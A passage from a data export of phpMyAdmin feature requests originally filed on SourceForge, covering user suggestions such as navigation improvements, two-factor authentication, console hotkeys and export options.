example case i have 15 databases on a mysql server each db has 100 tables ), if a browse 5 of them i will have to scrool a lot, and because i m not in the mood to press to collapse the ones i dont use anymore, i have to sign out and sign back in.
real case i have 54 databases and 2593 tables for me it s annoying to do all this.
anyone feels the same ) ?
sql SELECT IFNULL table schema, Total ) Database ,TableCount FROM SELECT COUNT 1) TableCount,table schema FROM information schema.tables WHERE table schema NOT IN information schema , mysql ) GROUP BY table schema WITH ROLLUP) A; Original URL https sourceforge.net p phpmyadmin feature requests 1486 Original author cybernet2u","enhancement"
"24444","6188","Please support cfg[ CtrlArrowsMoving ]=false again.
I found a developer mailing list discussion of 2010 about removing the option to disable the Ctrl Arrows Moving feature, because none of your developers could imagine even one useful reason to disable it.
Well, I can imagine a reason, and I suffer from this annoying feature every day I have to use phpMyAdmin When I need to edit field content with a lot of text to patch e.g.
typos or changed values, I wish I could make the text cursor jump to the previous next word using Ctrl left right) arrows.
I never felt a need to jump between fields which works just as well with the Tab key) as much as I feel the need to jump word wise inside text.
Original URL https sourceforge.net p phpmyadmin feature requests 1548 Original author ligh1l","enhancement"
"24444","6189","Browse foreign values should be a modal dialog.
Currently, browse foreign values opens a distinct window.
This could be replaced by a modal dialog like what is done at several places, for example get more editing space for ENUMs, or the index creation dialog).
Original URL https sourceforge.net p phpmyadmin feature requests 1487 Original author lem9","enhancement"
"24444","6190","User privilege tab not shown in all relevant cases.
Sometimes the Users tab should be shown for a non root user but it is not.
For instance A user with only GRANT or CREATE USER privileges globally) should be shown the User tab.
Probably a user with similar database specific privileges no global privileges) should also be shown the Users tab, though in this case in particular we might want to discuss what this would look like as they won t be given access to the Global privileges, only for that database).
Original URL https sourceforge.net p phpmyadmin feature requests 1488 Original author ibennetch","enhancement"
"24444","6191","New text is visible in navigation frame even when no Create permissions exist.
If a user does not have CREATE permission, the New text and icon should not be displayed in the left hand navigation area or perhaps better, the icon should be the red circle with a white X and on mouseover the tool tip should read No privileges Original URL https sourceforge.net p phpmyadmin feature requests 1489 Original author ibennetch","enhancement"
"24444","6192","Dynamic process list.
In Server > Status > Processes, it would be interesting to add a button to start dynamic refreshing of the process list, with a configurable refresh rate like in Server > Status > Monitor > Settings.
Original URL https sourceforge.net p phpmyadmin feature requests 1490 Original author lem9","enhancement"
"24444","6193","Support InnoDB for database Query by example.
In Database > Query multi table query by example), LEFT JOIN clauses are generated only for internal relations from the configuration storage).
Support should be added for InnoDB foreign keys.
This is known limitation, see FAQ 3.6.
Original URL https sourceforge.net p phpmyadmin feature requests 1491 Original author lem9","enhancement"
"24444","6194","Remove the distinct query window Add SQL log history panel.
We no longer need the distinct query window seperate window opening from the navi panel or from the top Edit link in browse mode).
Its SQL history should be kept and moved to the screen bottom, along with a section always showing the latest SQL query performed.
Original URL https sourceforge.net p phpmyadmin feature requests 1492 Original author lem9","enhancement"
"24444","6195","Feature request minimal courtesy in StackOverflow help system.
I don t want to post details here, but I can t find any other way of reporting this.
I posted a perfectly reasonable support question on StackOverflow, which was responded to in a patronizing and totally unhelpful way.
When I objected, I found the comment thread deleted and a 1 rating given to my question.
A very poor substitute for actual support.
Original URL https sourceforge.net p phpmyadmin feature requests 1497 Original author roblewis","enhancement"
"24444","6196","Add datepicker for TIME type.
Currently there is no datepicker for the date type.
I think it s worth to implement it Original URL https sourceforge.net p phpmyadmin feature requests 1498 Original author vpowerrc","enhancement"
"24444","6197","Enhance security by adding support for 2 factor authentication via Google Authenticator.
My hoster recently added support for securing the hosting admin panel with 2 Factor Authentification, using Google Authenticator.
The only weak link left is the phpmyadmin access which does not support that.
It would be great if users would have the option within PMA settings to enable 2 Factor Authentication to further secure their databases and prevent brute force attacks if the login site is publicly available.
More infos on Google Authenticator can be found here http code.google.com p google authenticator Original URL https sourceforge.net p phpmyadmin feature requests 1499 Original author robertharm","enhancement"
"24444","6198","Add bottom border to top menu container.
Hey guys, it is possible to set a line to the bottom of the top navigation?
This looks without line of something cut off.
I ve tested it with the developer tools and the following little code add this line for a better overview topmenucontainer { border bottom 1px solid rgb 204, 204, 204); } I think its better ) Original URL https sourceforge.net p phpmyadmin feature requests 1500 Original author dennis1993 Attachment http sourceforge.net p phpmyadmin feature requests 1500 attachment Unbenannt 1.png","enhancement"
"24444","6199","add maxlength by field with length spec.
Hello, I have a little idea to improve the input form.
1.
Set the length spec by creating a cloumn 2.
Insert a new entry to this table 3.
All fields with length specification should have the maxlength attribute So I can add only data with the right length.
At the moment I can create a field with e.g.
10 charaters and insert a data with 20 charakters and see after saving, that the inserted data is to long for this column... ) It is a good idea or bad one? )
Thank you!
Original URL https sourceforge.net p phpmyadmin feature requests 1501 Original author dennis1993","enhancement"
"24444","6200","Smart sorting for int keys.
Could int primary) keys be sorting descending by default?
Newer rows are often more interesting than older rows.
Original URL https sourceforge.net p phpmyadmin feature requests 1502 Original author olafvdspek","enhancement"
"24444","6201","Databse Sizes.
Can you please add Database Size to the Databases page so people can view how big their databases are?
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 1503 Original author jurgen73","enhancement"
"24444","6202","automatic scrolling on selecting database.
When we select a database from navigation panel on left, the expanded table list in tree view is displayed in the current position, while it d be more appropriate to scroll up the navigation panel to the position of selected db.
It d give user better quick access to tables in selected db Original URL https sourceforge.net p phpmyadmin feature requests 1504 Original author mebjas","enhancement"
"24444","6203","Behaviour on click on a routine in nav panel.
Right now clicking on a routine inside nav panel shows the edit dialog and clicking on the icon left to it shows the export dialog.
But clicking on the routine link to show execute dialog and clicking on the image to show editor dialog is more appropriate.
Original URL https sourceforge.net p phpmyadmin feature requests 1505 Original author omerjerk","enhancement"
"24444","6204","Sever Variables Table UI Improvements.
1.
Shift the Edit Button to the right which display on hover event of a row 2.
Remove hover event and use simple and more sensible static Edit button 3.
Reduce the table width as needed Original URL https sourceforge.net p phpmyadmin feature requests 1567 Original author chanaka777","enhancement"
"24444","6205","Search for a database and navigate to it.
We have a lot of databases > 1000), and would love to have a way to search for a specific database on the list of databases view.
Original URL https sourceforge.net p phpmyadmin feature requests 1506 Original author justink101","enhancement"
"24444","6206","Sort by Multiple Columns.
If you browse any table in a database then you have an option to sort by a particular column by clicking on the column name in table header but i was thinking of adding sort by multiple columns together.
Example In the following link Click on Sort by Gender press Shift key hold it down) and then press Name .
http web.iiit.ac.in ayush.datta phptest unit testing index.php It groups and sorts by Gender then in Gender it sorts by Name.
Original URL https sourceforge.net p phpmyadmin feature requests 1507 Original author ayushdatta","enhancement"
"24444","6207","Usability improvements for console.
Hello, it would make sense to have hotkeys similar to chrome browser console or any other browser have.
1) First of all an ability to cycle through history by using keyboard s up down arrow keys.
This would create a great rapid development experience in cases when developer wants to do a minor change to the last or frequent query executed and test it again.
2) Change query execution shortcut ctrl enter to a plain enter and use shift enter for a new line.
The motivation behind this is that developers mostly write a one line select queries, so it would make sense to have a shorter hotkey for a more frequent action.
3) Would it be possible to set a focus on the edit if user clicks anywhere on the white space just below edit.
Best regards, Linas Paxc5xa1viestish Original URL https sourceforge.net p phpmyadmin feature requests 1570 Original author crylar","enhancement"
"24444","6208","confirmation message at the top.
When deleting records, the confirmation message shows up at the bottom of the screen.
If the number of records are large the user has to scroll through the entire set of queries to confirm it.
It would be better if we could display a confirmation message at the top as well as bottom so that user can quickly confirm whether he wants to execute the queries or not.
Original URL https sourceforge.net p phpmyadmin feature requests 1508 Original author architv","enhancement"
"24444","6209","Metro theme update to work with 4.1.8.
Any word when the amazing theme Metro will be updated to fully support 4.1.8.
I love this theme, but can t use it fully with 4.1.8.
Original URL https sourceforge.net p phpmyadmin feature requests 1509 Original author justink101","enhancement"
"24444","6210","Database tab Drop button should be a link.
From the main page, follow the Databases tab.
At the bottom of the listing of databases is an icon with the text Drop.
Those should be improved so that when hovering over it, the mouse cursor changes to show it s a link.
Currently it just stays as a pointer which is not ideal UI behavior.
Original URL https sourceforge.net p phpmyadmin feature requests 1510 Original author ibennetch","enhancement"
"24444","6211","Provide for a database select dropdown in navigation panel as in pre 4.0 versions.
I d like to revert to the legacy navigation pane layout.
Is this still possible?
If not, could you re add it?
I don t want to waste space on other databases when I ve already selected a DB.
Proposed change Modify the navigation tree to provide for pre 4.0 style database select box.
But it won t be exactly same as old style, rather we will retain the database specific tree at table view level, but for databases there will be select box.
It will be usable by setting ShowNavigationAsTree configuration option to false .
Original URL https sourceforge.net p phpmyadmin feature requests 1574 Original author olafvdspek","enhancement"
"24444","6212","Rename database interface improvement.
From a database, the Operations tab allows us to rename a database.
If no name is provided, we first get a popup asking if we re sure we want to drop and create it, then a popup that The database name is empty!
; we should check for a database name before the confirmation message.
Original URL https sourceforge.net p phpmyadmin feature requests 1511 Original author ibennetch","enhancement"
"24444","6213","Add function to all the insert boxes automatically.
In the event of insertion of data, when adding a particular function to a column, it is most likely it applies to all the records of that table.
So in a scenario where user is adding multiple records at a time it would be helpful if the function of the first insert box is automatically applied to other insert boxes as well.
If you think it s worth implementing, I can add to the Interface Improvement project for GSoC Original URL https sourceforge.net p phpmyadmin feature requests 1514 Original author vpowerrc","enhancement"
"24444","6214","Option to skip tables larger than n. When export a database can we add a select button to skip data table more than user specified value and also export it any user specified location.
Original URL https sourceforge.net p phpmyadmin feature requests 1515 Original author hasithapsd1","enhancement"
"24444","6215","Support for virtual persistent columns.
currently virtual columns as defined by mariadb https mariadb.com kb en virtual columns ) are not supported.
It is not possible to edit or create these columns.
Even more after changing columns in phpmyadmin and adding columns via plain sql, phpadmin sometimes refuses to load the table.
Original URL https sourceforge.net p phpmyadmin feature requests 1517 Original author mokraemer","enhancement"
"24444","6216","Confirm dialog on accidentally leaving a page.
I think there should be a confirm navigation confirmation if user makes an attempt to leave corresponding page, while he has already started another operation like creating table.
Have a look at attachment for further details Original URL https sourceforge.net p phpmyadmin feature requests 1518 Original author mebjas Attachment http sourceforge.net p phpmyadmin feature requests 1518 attachment fbdoesthis.png","enhancement"
"24444","6217","SQL command output on export.
Hi.
I am using PHPmyAdmin to get tasks done but also to learn SQL.
It would be very useful if when exporting a database the command with all the flags is displayed.
This would be a good feature to be able to turn on across all commands which can be executed across the application Original URL https sourceforge.net p phpmyadmin feature requests 1519 Original author londonnet","enhancement"
"24444","6218","CRUD front end for users.
Hi, it would be great to have an add on to PHPmyAdmin that provided a user interface for search and data entry with customised views.
Spec User login and security hierarchy Simple search Add, Delete, Modify records Customisable table views hide some columns, relable them) Advanced features like check for unique or random number generation Export and import Customisable buttons which grab variables from the current data view Link tables together to provide mixed views Program drop down menue options for entering data The aim of the add on is to provide a customisable user front end I suspect it would work by holding the applications configuration in SQL and provide a number of PHP pages much like phpmyadmin For reference take a look at vfront.org This project is a good example however the project has stooled.
A close connection to phpmyadmin completes to circle of database administration anddata entry.
Best regards Original URL https sourceforge.net p phpmyadmin feature requests 1520 Original author londonnet","enhancement"
"24444","6219","Update documentation for automatic Configuration Storage feature.
We should update the documentation, specifically the part about creating and configuring the phpMyAdmin Configuration Storage, to reflect the new automatic features.
I suggest leaving the existing documentation but adding a line mentioning the automatic stuff.
Original URL https sourceforge.net p phpmyadmin feature requests 1584 Original author ibennetch","enhancement"
"24444","6220","Idea for change the table style when show data ..
I think that we should change the table style show data like this style http handsontable.com It s very useful.
Original URL https sourceforge.net p phpmyadmin feature requests 1586 Original author phongung","enhancement"
"24444","6221","Confirmation message when dropping a user.
As reported by J.M., when removing a user from the Users tab, there is no confirmation message after clicking Go.
We should prompt the user to make sure they really want to drop the user.
Original URL https sourceforge.net p phpmyadmin feature requests 1521 Original author ibennetch","enhancement"
"24444","6222","Drag and Drop sql import.
Its an improvement to the import feature that exists currently If a user drags and drop a .sql file to the pma interface anywhere) the interface should import it and execute it.
There should not be a condition that user drops it to import page only.
In case db is not selected, we can show a custom error, otherwise, upload the file asynchronously and execute the query just like it happens when import is done.
I m expecting a UI similar to how it happens in google drive attached for reference) Original URL https sourceforge.net p phpmyadmin feature requests 1522 Original author mebjas Attachment http sourceforge.net p phpmyadmin feature requests 1522 attachment feature 20request.png","enhancement"
"24444","6223","Better visual clue for table structure primary key column.
The underline style for showing a column with a key in the Structure tab) can be misunderstood, underlining hyperlinks only is better.
The suggestion is to instead put a small key icon in front or behind the name of the column to indicate that it s a key.
Original URL https sourceforge.net p phpmyadmin feature requests 1523 Original author zweisteinsoft","enhancement"
"24444","6224","Adding an extra icon next to column names for use in SQL editor.
It would be useful adding an icon next to column names in the left tree to add it s name into the sql editor at the right pane.
The Blue Column Icon could also be replaced with an arrow or a SQL text icon to do this job.
Thanks ;) Original URL https sourceforge.net p phpmyadmin feature requests 1524 Original author amibct","enhancement"
"24444","6225","Make export sql more friendly to side by side comparison.
I frequently need to find differences between two versions of the same db in order to create a script for migration.
The way I usually proceed is to create a structure only dump in phpmyadmin and compare the results using WinMerge or a similar tool.
This works great to detect new tables and columns but can be improved for changes in indices and foreign key constraints.
The main problem with the currently generated dump is that each ADD INDEX, ADD CONSTRAINT statement is generated in the order it was added to the database I think).
This makes two identical structures show up as different in a file compare tool because indices may have been created in different sequence in each database.
If all indices and constraints were sorted by name, the lines would appear in the same order and not be marked as different.
I do not know if the order of indices constraints can be important in certain situations I can t think of such scenarios.
But if that might be the case, the sorting of keys constraints in a dump can at least be triggered using a configuration option.
Original URL https sourceforge.net p phpmyadmin feature requests 1526 Original author artemkh","enhancement"
"24444","6226","Charts for data in <x axis, series, value> format.
As of version 4.2, charts support data in {x axis, series1 value, series2 value,..} format, which matches natural structure of table in most cases.
However charts do not support data in {x axis, series name, value} format, which was the format used prior to version 4.0.
It s better to support both of these formats, with some ui selection given to the user to select between them.
Original URL https sourceforge.net p phpmyadmin feature requests 1527 Original author madhuracj","enhancement"
"24444","6227","Can t find the supplied .htaccess ?.
in http docs.phpmyadmin.net en latest setup.html?highlight=htaccess quick install Section Using setup script 3.
You should deny access to the .
libraries and .
setup lib subfolders in your webserver configuration.
For Apache you can use supplied .htaccess file in that folder, for other webservers, you should configure this yourself.
Such configuration prevents from possible path exposure and cross side scripting vulnerabilities that might happen to be found in that code.
I can t find the supplied .htaccess ?
Original URL https sourceforge.net p phpmyadmin feature requests 1528 Original author calim","enhancement"
"24444","6228","make professional code editor suggestion.
Hi The newest update with suggestion code editor is very efficient.
Please add this attribute to code editor suggestion Example is in image.
thx.
Original URL https sourceforge.net p phpmyadmin feature requests 1595 Original author mghhgm","enhancement"
"24444","6229","Avoid session timeout when user is active.
When user is active eg.
writing SQL query), phpMyAdmin should avoid session timeout as this can have unpleasant results.
Use case user opens SQL page user edits the SQL query for the cookie expiry or session timeout time the query is lost on submission No activity within 1440 seconds, please login again I think phpMyAdmin should make background keepalive requests to the server when user is doing some activity eg.
typing a query).
Original URL https sourceforge.net p phpmyadmin feature requests 1529 Original author nijel","enhancement"
"24444","6230","Fast filter improvement remove x other results found .
Current Situation x other results found is meant to distinguish current page filtered results from the results returned by the server from other pages).
But as observed, the server is anyway returning all results including the ones already on current page, so x other results found introduces unnecessary delay and confusion.
Also, there is no user will involved whether to just filter from available current page or to get results from other pages also.
This sends subsequent AJAX requests as user types.
Proposed change So as user types, we could make it just a filter for current page and if the user presses Enter then only we send AJAX request thereby clearly differentiating between the two and removing delays.
This is in part related to http sourceforge.net p phpmyadmin bugs 4710 Original URL https sourceforge.net p phpmyadmin feature requests 1597 Original author atul5","enhancement"
"24444","6231","Cant use external config file.
I am running pma through composer and would like to be able to have a config file somewhere that is not in the root of pma Setting an include path in apache to my custom path which has the config file does not work probably because the configs are coded to the specific path .
config.inc.php if this was config.inc.php , php would be able to use my custom include path and load the right file Original URL https sourceforge.net p phpmyadmin feature requests 1531 Original author dogmatic6969","enhancement"
"24444","6232","Authentication log.
It would be nice to see phpMyAdmin to have a log for authentication successful failed), this way products like fail2ban, lfd, bfd could be setup to automatically block brute force attacks.
At least a log of IPs who got Wrong username password.
Access denied.
would be a good start.
Original URL https sourceforge.net p phpmyadmin feature requests 1532 Original author peterphp","enhancement"
"24444","6233","PHP OpenSSL support for cookie encryption decryption.
Please add PHP OpenSSL support additionally to PHP Mcrypt and phpseclib), attached is a patch which contains my proposal.
Original URL https sourceforge.net p phpmyadmin feature requests 1537 Original author robert scheck Attachment http sourceforge.net p phpmyadmin feature requests 1537 attachment phpMyAdmin 4.2.6 openssl.patch","enhancement"
"24444","6234","Add Option to disable JS Function Like Sorting or Moving columns.
Two reasons for this request 1. since all labels on columns have events like click, move, ... you can t select the text name) of the column to use this in a new query, which is quite annoying if the names are more complex.
2.
Loading of large tables e.g.
joined tables) takes long not for displaying 3 seconds) but long to add all js code to each column, line or what ever.
Until the table can be scrolled used) and the message Loading disappears it takes 2 minutes.
But the data is already loaded and dsiplayed.
Original URL https sourceforge.net p phpmyadmin feature requests 1538 Original author mokraemer","enhancement"
"24444","6235","Recover query in redaction after session end.
If your session ends, your current query is discarded and your browser is redirected to the login page.
Suppose it has taken you a long while to create that statement and you finally got what you want, the telephone rings and you can start from the beginning.
phpmyadmin prior 4 just stayed where it was.
Even if it redirects you could save the last query COOKIE) or put it in your redirect code to save it.
Original URL https sourceforge.net p phpmyadmin feature requests 1602 Original author mokraemer","enhancement"
"24444","6236","option to disable JS Windows for errors.
Plse add an option to redisplay the old error div if sth.
failed.
If you have a long text) sql query failing, you get an totally undersized js error dialog which is hard to read closes on an accidential click.
I suggest add an div on top of the page, containing the error, have the query section with inline,...) under it.
Having this, you can see the error on full monitor width, second you can change the query to make it work maybe you can put a structured output above it.
Sometimes only a quote or brace is missing, which you must find.
Original URL https sourceforge.net p phpmyadmin feature requests 1539 Original author mokraemer","enhancement"
"24444","6237","Add option to bypass MySQL version check.
Right now, PMA always checks for the version of MySQL on the server you are connecting, not necessarily the server PMA is installed.
In my case, I m administrating a couple of servers, and one of them is on MySQL 5.0 can change that unfortunately).
But PMA itself is running on the latest Ubuntu version.
But since it checks the version of the server I m connecting, I can t use the latest versions.
It would be nice to have at least an option on the server list that would allow you to override the version check on common.inc.php .
Original URL https sourceforge.net p phpmyadmin feature requests 1540 Original author samuelsol","enhancement"
"24444","6238","Tool tip for lock icon when making changes to a page.
When a user makes changes to a page, such as beginning to enter an SQL query, the page locks so that the user is prompted when they navigate away from the page.
To indicate this, a lock icon appears in the upper right corner.
I think we should provide a tool tip when hovering over this so that users know what the lock icon is for.
I propose Indicates that you have made changes to this page; you will be prompted for confirmation before abandoning changes Any thoughts about this?
Original URL https sourceforge.net p phpmyadmin feature requests 1607 Original author ibennetch","enhancement"
"24444","6239","disable foreign keys check for current operation.
Target version 4.5 Add option to import !
, delete, truncate, sqlquery) disable foregin key check.
im symfony php developer, offen i need remove or make some changes i must add SET FOREIGN KEY CHECKS=0; query SET FOREIGN KEY CHECKS=1; i think nice will by option auto disable foregin key checks.
But for import is necessary i export db from phpmyadmin.
try import and this is not possible when i have foregin keys popular doctrine php orm add it many) so must manualy edut file add SET FOREIGN KEY CHECKS=0; and at the end SET FOREIGN KEY CHECKS=1; and when file is big is hard to edut it.
Many problems so option disable foregin key check for this operation will by very good Original URL https sourceforge.net p phpmyadmin feature requests 1541 Original author grek pg","enhancement"
"24444","6240","Better error reporting in Designer; can get stuck Processing.
Using Designer, I can cause it to get stuck on Processing Request without returning the MySQL error message to the user.
It should catch the MySQL message and display it instead of getting stuck on the Processing Request message.
I discovered this when I had referencing ID values that were not in the referenced table, but the problem exists for other failure modes as well for instance, trying to create a relation where the proper columns are not indexed).
The easiest way to reproduce my use case is to look at the attached .sql basically, `main` references an id 0 in `reference` which doesn t exist; this causes a problem creating the relation, but phpMyAdmin stops as Processing Request and doesn t do anything more.
In my example data, EMPTYing the two tables allows one to create the relation, confirming that the problem is the improper id values.
Original URL https sourceforge.net p phpmyadmin feature requests 1542 Original author ibennetch Attachment http sourceforge.net p phpmyadmin feature requests 1542 attachment designer trouble.sql","enhancement"
"24444","6241","Responsive mobile.
Hi, the world gets more mobile everyday, so I think it would be a good idea to make phpMyAdmin responsive, so it s optimized for smartphones and tablets too instead of desktop only.
Sometimes I have to wait to edit something in te database, only because i m not in reach of a desktop PC.
Original URL https sourceforge.net p phpmyadmin feature requests 1612 Original author roboroad","enhancement"
"24444","6242","Disable double click to edit by default.
I frequently use double click to select a word, but double click has now been hijacked for quick edits.
Could this be disabled by default?
Original URL https sourceforge.net p phpmyadmin feature requests 1543 Original author olafvdspek","enhancement"
"24444","6243","MySQL 5.7.5 compatibility.
According to http dev.mysql.com doc relnotes mysql 5.7 en news 5 7 5.html, starting with MySQL 5.7.5, support for pre 4.1 password hashing is removed.
In phpMyAdmin 4.3 we should verify whether MySQL is 5.7.5 or later and if so, remove the password hashing choice in the password change dialog.
Original URL https sourceforge.net p phpmyadmin feature requests 1544 Original author lem9","enhancement"
"24444","6244","Autofill and more flexible sql tab.
Hi, Developers.
Thanks you for this brilliant project.
I want to propose 2 features 1) Make auto fill to finish table names or column.
Like tab do inside bash, finishing dir and file names.
It will be really helpful.
2) I enjoy SQL builder, if you was able to make it undersatand inner joins commands select sevaral tables and show available colums for all of them) this will be really helpfull.
Currently, you support only one table or nothing if you click SQL tab being inside database).
thank you.
Original URL https sourceforge.net p phpmyadmin feature requests 1545 Original author tigrantsat007","enhancement"
"24444","6245","Automatically save new table after naming first column.
Naming a table is not always a users first action when creating a new table, sometimes its the last before clicking Save.
If a user leaves their station or visits another window tab while creating a table, the inactivity clock counts down.
If the user doesn t press Save before the countdown expires, the user loses everything, has log in again and re enter whatever details had already been entered prior to the countdown expiring.
It would be greatly appreciated by all users if a new table was automatically saved after naming the first column regardless of whether the user has entered a table name or not.
If no table name has been entered when the countdown expires, automatically save it as table1 perhaps.
So if the user has 20 column names entered when the countdown expires, the user won t have to re enter everything again after logging in again.
Original URL https sourceforge.net p phpmyadmin feature requests 1615 Original author richarddunnebsc","enhancement"
"24444","6246","Improve the js printf library.
Marc > After seeing this commit [0] I expect we can improve our codebase.
> > Can someone have a look to find and test) a better sprintf js library > GPL compatible)?
Maybe [1] which is licensed under the so called MIT > license, which is GPL compatible.
> > [0] https github.com phpmyadmin phpmyadmin commit 8ad314d1f011ddbcec0718ddd48041e1f820137a > > [1] http phpjs.org functions sprintf Atul > Yeah, I think we could do with more formatting options when displaying js > messages to users.
> > [1] http phpjs.org functions sprintf > > Actually, original version of this one is already in use within jqplot and > it quite fulfills formatting tasks for charts, so I also think it is a good > option.
Original URL https sourceforge.net p phpmyadmin feature requests 1546 Original author lem9","enhancement"
"24444","6247","Wrap message with message box.
When there are no tables in a database, structure tab shows message No tables found in database.
without any message box.
Since this is just an information, information icon could be used with message box.
Original URL https sourceforge.net p phpmyadmin feature requests 1547 Original author chanaka777","enhancement"
"24444","6248","Reset auto increment when exporting structure.
Is it possible to add an option to reset auto increment value, on exporting only database structure?
Because when user wants structure and no data, what s the need for auto increment value, which is related to data?
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 1549 Original author mohrd","enhancement"
"24444","6249","Can t unhide table from sub database.
I have a database named ideal inv, which is displayed as a tree, e.g.
ideal > inv > ideal inv.
I hid a table users), but no unhide icon shows up, as it does on the test database.
Original URL https sourceforge.net p phpmyadmin feature requests 1622 Original author conquerthis Attachment http sourceforge.net p phpmyadmin feature requests 1622 attachment phpMyAdmin 20can 27t 20unhide.png","enhancement"
"24444","6250","PMA URL getCommon ) new style.
This function supports two calling styles but the old one is deprecated; so finish transforming all calls to the new style, then remove support from old style inside the function.
Original URL https sourceforge.net p phpmyadmin feature requests 1550 Original author lem9","enhancement"
"24444","6251","Integrate SQL debugging into console.
Target version 4.5 SQL debugging is a feature that helps developers debug SQL queries generated by phpMyAdmin and is enabled by cfg[ DBG ][ sql ] configuration.
As suggested by Marc Delisle, it would be better to integrate SQL debugging to the new console to be) introduced in version 4.3 Original URL https sourceforge.net p phpmyadmin feature requests 1551 Original author madhuracj","enhancement"
"24444","6252","CSV import Allow Columns escaped with to be optional.
As brought up in [this post] https stackoverflow.com questions 26441151 mysql importing csv file with phpmyadmin without cell quotes 26457608 26457608), it seems Columns escaped with is a required field during CSV import.
We should allow the user to leave this field blank if they desire.
An additional comment by Marc > Avoiding the handling of cfg[ Import ][ csv escaped ] would require a > change of logic in libraries plugins import ImportCsv.class.php.
Original URL https sourceforge.net p phpmyadmin feature requests 1552 Original author ibennetch","enhancement"
"24444","6253","Error 1795 InnoDB presently supports one FULLTEXT index creation at a time.
While exporting structure of table with few FULLTEXT indexes PhpMyAdmin exports all indexes together, namely > ALTER TABLE `table name` ADD FULLTEXT KEY `text1` `text1`), ADD FULLTEXT KEY `text2` `text2`); And because of this on import you ll get > 1795 InnoDB presently supports one FULLTEXT index creation at a time That is why PhpMyAdmin at export should separate creation of FULLTEXT indexes into few SQL commands.
Original URL https sourceforge.net p phpmyadmin feature requests 1553 Original author nazar pc","enhancement"
"24444","6254","Add a quick search button for each table.
Hi please add a quick search button for each table in the left list for quick access to search page like this image http prntscr.com 4zvz3f thanks Original URL https sourceforge.net p phpmyadmin feature requests 1554 Original author asmanmmsj","enhancement"
"24444","6255","Should help to automatically re login.
When I try to use PHPMyAdmin after a period of time, it says Error Token mismatch .
Instead it should prompt to re login.
Original URL https sourceforge.net p phpmyadmin feature requests 1555 Original author porton","enhancement"
"24444","6256","Disabling Show all.
Can you tell me how to display partial items in the Browse page?
I clicked the Show All button by accident, and I didn t know how to disable Show All .
It s really annoying!!
I hope you can fix it in the next release.
Original URL https sourceforge.net p phpmyadmin feature requests 1556 Original author zjhzxhz","enhancement"
"24444","6257","Option to remove functions and procedures from navigation tree.
Target version 4.5 i would like to remove functions and procedures from navigation tree i don t use it and i think it slows down the page and i need to click once more to select table thanks Original URL https sourceforge.net p phpmyadmin feature requests 1557 Original author freeman3","enhancement"
"24444","6258","Designer menu.
Target version 4.5.
The Designer menu needs improvements.
It should obey the cfg[ TabsMode ] setting by default, show both text and icons).
Also, items should be regrouped and a menu level should be added.
For example, icons less often used like angular links, snap to grid, etc) could be regrouped under Options.
See also https wiki.phpmyadmin.net pma 2014 11 Meeting Designer icons.
Possibly for GSoC 2015.
Original URL https sourceforge.net p phpmyadmin feature requests 1558 Original author lem9","enhancement"
"24444","6259","Page related settings.
Target version 4.5 We have a centralized Settings page with sub pages.
This feature adds a way to quickly reach the settings related to a feature, on this feature s page.
Maybe just a subset of these settings could be shown.
There are also other ways to set options.
In Browse, we have Options, and other remembered settings like column visibility, column sorting and order of display.
I am not sure if these mechanisms should be integrated or not to the new way.
See https wiki.phpmyadmin.net pma 2014 11 Meeting Page related settings Possibly for GSoC 2015.
Original URL https sourceforge.net p phpmyadmin feature requests 1559 Original author lem9","enhancement"
"24444","6260","Change table name or column name directly on double clicking on it.
Hello friends, I am fresher in it, I have idea to change column name and table name by double clicking on name from user interface.
I ready to develop this kind of feature in phpmyadmin.
Original URL https sourceforge.net p phpmyadmin feature requests 1638 Original author krutikparikh","enhancement"
"24444","6261","All Languages version via composer packagist.org.
it is great that phpmyadmin is available through composer via packagist.org but there is no way to checkout the all languages version via composer.
Right!?)
Do you see any solution to make a version including the language files available via composer?
Possible options add the locale folder to the git repo add the locale folder to the GitHub releases Original URL https sourceforge.net p phpmyadmin feature requests 1560 Original author cfoellmann","enhancement"
"24444","6262","Being able to use multiple servers at the same time when using cookie auth.
Setup 1 phpMyAdmin installation 4.2.10.1), configured to use cookie auth.
3 different MySQL servers.
Problem Only one server is usable at the same time in the same browser.
How to reproduce Open phpMyAdmin and log in into a first MySQL server.
Browse a few pages to ensure everything is working fine.
Open a new tab in the same browser and open phpMyAdmin again.
Log in into a second server.
Browse a few pages on said second server to ensure everything is working fine.
Now go back to the first server and try to navigate to any page, like the database list.
The session on the first server is then closed, and the log in form is displayed with error Your session has expired.
Please log in again.
.
I dug into the source code to understand what was going on.
The PHP session identifier is stored into cookie phpMyAdmin .
Each time a user logs in, this cookie is overwritten.
Then, only the corresponding session can work, otherwise a token mismatch error is generated in libraries common.inc.php line 462, variable token mismatch).
Do you plan to make this work in the future?
Original URL https sourceforge.net p phpmyadmin feature requests 1561 Original author zewaren Attachment http sourceforge.net p phpmyadmin feature requests 1561 attachment config.inc.php","enhancement"
"24444","6263","Allow tracking multiple table at once from database level tracking page.
Implemented with https github.com phpmyadmin phpmyadmin pull 1408 Original URL https sourceforge.net p phpmyadmin feature requests 1562 Original author madhuracj","enhancement"
"24444","6264","Allow changing the keyboard shortcut for console.
Change disable let user assing different keyboard shortcut for console display.
Now 4.3.0 beta1) the keyboard shortcut is escape button and if you use it to close various dialogs e.g.
autocomplete) most of the time it will open console.
Original URL https sourceforge.net p phpmyadmin feature requests 1563 Original author aurelijusr","enhancement"
"24444","6265","Improve action message on Tracking page.
In database Tracking, maybe we wanted to recycle one translation, but the Drop action is not clear.
I suggest Delete tracking .
Original URL https sourceforge.net p phpmyadmin feature requests 1564 Original author lem9","enhancement"
"24444","6266","MIME Transformation Imagelink and link repairs and idea.
Hello.
I found some thing when I play with MIME transformations.
1) I found if I use Browser display transformation as Text Plain Link and show the table, then click od the link, the link doesn t work properly, because I am redirected to phpmyadmin main page, not to the link page.
2) Would be possible to add new parameter to the Text Plain Imagelink and show size of picture in the table?
3) When I am using Text Plain Imagelink , the base folder is local phpmyadmin 1stOption.
It s easy to jump to upper folder and than specify project name 1stOption = .. projectname ... ), but I think it will be better to set base as project folder local projectname 1stOption ) or let the user select which one he want as default, because if I will use it on remote server, i think it will makes problems with path ...
Thanks a lot and I hope I am not wasting your time with my posts ) .
Original URL https sourceforge.net p phpmyadmin feature requests 1645 Original author jpalider","enhancement"
"24444","6267","Filling random test data in database.
Whenever we make any database, tables for any thing, mostly we need some random data for testing purposes.
So, if there is a feature which automatically inserts data into tables, respecting the constrains, foreign key relations, etc, that would be great!
Original URL https sourceforge.net p phpmyadmin feature requests 1565 Original author hharchani","enhancement"
